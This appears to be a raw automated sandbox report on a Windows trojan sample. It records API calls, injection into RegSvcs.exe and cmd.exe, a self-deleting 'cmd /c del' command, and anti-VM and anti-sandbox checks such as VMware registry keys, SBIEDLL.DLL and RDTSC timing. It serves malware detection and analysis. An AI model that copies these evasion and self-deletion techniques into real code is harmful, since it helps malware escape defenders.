          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FA9520 NtWaitForSingleObject,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FA96D0 NtCreateKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FA9670 NtQueryInformationProcess,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FA9650 NtQueryValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FA9610 NtEnumerateValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FA9770 NtSetInformationFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FAA770 NtOpenThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FA9760 NtOpenProcess,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FA9730 NtQueryVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FAA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_008758A4 _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_008784BE NtQueryVolumeInformationFile,GetFileInformationByHandleEx,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0087B4C0 NtQueryInformationToken,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0087B4F8 NtQueryInformationToken,NtQueryInformationToken,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0087B42E NtOpenThreadToken,NtOpenProcessToken,NtClose,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_00896D90 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0089B5E0 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_00899AB4 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_008783F2 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035E9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035E9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035E9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035E9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035E96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035E96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035E9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035E95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035E99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035E9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035E9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035E9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035EA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035E9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035EA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035E9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035E9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035EA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035E97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035E9650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035E9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035E9660 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035E9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035E9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035E9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035E9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035E9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035E9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035E9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035EAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035E9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035E99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035E95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035EB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035E9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035E98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035E98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_00886550: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPAX@Z,memset,??_V@YAXPAX@Z,FindClose,??_V@YAXPAX@Z,
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000000.242394304.0000000000D72000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameBINDOP.exeh$ vs TPJX2QwEdXs5sTV.exe
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.280628910.0000000001448000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs TPJX2QwEdXs5sTV.exe
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.282500066.000000000409E000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCF_Secretaria.dll< vs TPJX2QwEdXs5sTV.exe
          Source: TPJX2QwEdXs5sTV.exeBinary or memory string: OriginalFilenameBINDOP.exeh$ vs TPJX2QwEdXs5sTV.exe
          Source: TPJX2QwEdXs5sTV.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: TPJX2QwEdXs5sTV.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: TPJX2QwEdXs5sTV.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: TPJX2QwEdXs5sTV.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: TPJX2QwEdXs5sTV.exeReversingLabs: Detection: 17%
          Source: TPJX2QwEdXs5sTV.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe 'C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe'
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TPJX2QwEdXs5sTV.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@10/1@7/3
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0089A0D2 memset,GetDiskFreeSpaceExW,??_V@YAXPAX@Z,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0087C5CA _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,GetLastError,GetLastError,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,EnterCriticalSection,LeaveCriticalSection,exit,
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeMutant created: \Sessions\1\BaseNamedObjects\kSLmFPbu
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4116:120:WilError_01
          Source: TPJX2QwEdXs5sTV.exe, u0003u2001.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 1.2.TPJX2QwEdXs5sTV.exe.cd0000.0.unpack, u0003u2001.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 1.0.TPJX2QwEdXs5sTV.exe.cd0000.0.unpack, u0003u2001.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: TPJX2QwEdXs5sTV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: TPJX2QwEdXs5sTV.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: RegSvcs.pdb, source: cmd.exe, 00000017.00000002.521600812.0000000003AB7000.00000004.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000006.00000002.390723041.000000000105F000.00000040.00000001.sdmp, cmd.exe, 00000017.00000002.518459422.000000000369F000.00000040.00000001.sdmp
          Source: Binary string: cmd.pdbUGP source: RegSvcs.exe, 00000006.00000002.391607663.0000000002EB0000.00000040.00020000.sdmp, cmd.exe, 00000017.00000002.511566191.0000000000870000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdb source: RegSvcs.exe, cmd.exe
          Source: Binary string: RegSvcs.pdb source: cmd.exe, 00000017.00000002.521600812.0000000003AB7000.00000004.00020000.sdmp
          Source: Binary string: cmd.pdb source: RegSvcs.exe, 00000006.00000002.391607663.0000000002EB0000.00000040.00020000.sdmp, cmd.exe

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: TPJX2QwEdXs5sTV.exe, u0003u2001.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.2.TPJX2QwEdXs5sTV.exe.cd0000.0.unpack, u0003u2001.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.TPJX2QwEdXs5sTV.exe.cd0000.0.unpack, u0003u2001.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041B86C push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041B802 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041B80B push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041C292 push AD92C3EFh; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0040C335 pushfd ; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041CDE0 push F8C82648h; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041B6B3 push esp; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041B7B5 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FBD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_008876BD push ecx; ret
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_008876D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035FD0D1 push ecx; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.79647412085
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000001.00000002.281632826.0000000002FA1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: TPJX2QwEdXs5sTV.exe PID: 5056, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.281632826.0000000002FA1000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.281632826.0000000002FA1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 0000000002D985F4 second address: 0000000002D985FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 0000000002D9897E second address: 0000000002D98984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe TID: 4452Thread sleep time: -35576s >= -30000s
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe TID: 3104Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_004088B0 rdtsc
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeProcess information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0087B89C GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_008868BA FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0088245C FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_008931DC FindFirstFileW,FindNextFileW,FindClose,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_008785EA memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeThread delayed: delay time: 35576
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000008.00000000.314540524.0000000008A32000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000008.00000000.314540524.0000000008A32000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000008.00000000.295449841.0000000008CEA000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}qqqqqqqqqqqqqq%%
          Source: explorer.exe, 00000008.00000000.339578610.0000000008B4E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.281632826.0000000002FA1000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000008.00000000.339578610.0000000008B4E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.281632826.0000000002FA1000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.281632826.0000000002FA1000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000008.00000000.368949944.00000000048E0000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000008.00000000.339578610.0000000008B4E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
          Source: explorer.exe, 00000008.00000000.294727832.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.281632826.0000000002FA1000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: explorer.exe, 00000008.00000000.294727832.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000008.00000000.309101909.00000000069DA000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD002
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.281632826.0000000002FA1000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.281632826.0000000002FA1000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.281632826.0000000002FA1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.281632826.0000000002FA1000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_00892258 IsDebuggerPresent,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_00886C9A GetProcessHeap,RtlFreeHeap,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_004088B0 rdtsc
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmd.exeProcess token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FFB8D0 mov eax, dword ptr fs:[00000030h]
